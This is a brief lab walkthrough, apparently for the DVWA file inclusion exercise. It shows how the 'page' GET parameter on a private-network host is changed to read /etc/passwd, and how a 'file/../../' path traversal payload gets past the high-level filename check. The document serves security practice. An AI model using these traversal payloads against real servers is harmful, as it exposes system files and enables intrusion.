Security level: low
In url there is GET parameter page used for including file.
url:http://192.168.170.131/vulnerabilities/fi/?page=include.php
By changing this file location we can read file on server.
url:http://192.168.170.131/vulnerabilities/fi/?page=/etc/passwd
Also work for medium.
Security level: high
we have one condition that file name should start with file.
we can bypass that with payload:file/../../../../../../etc/passwd path traversal.
Happy Hacking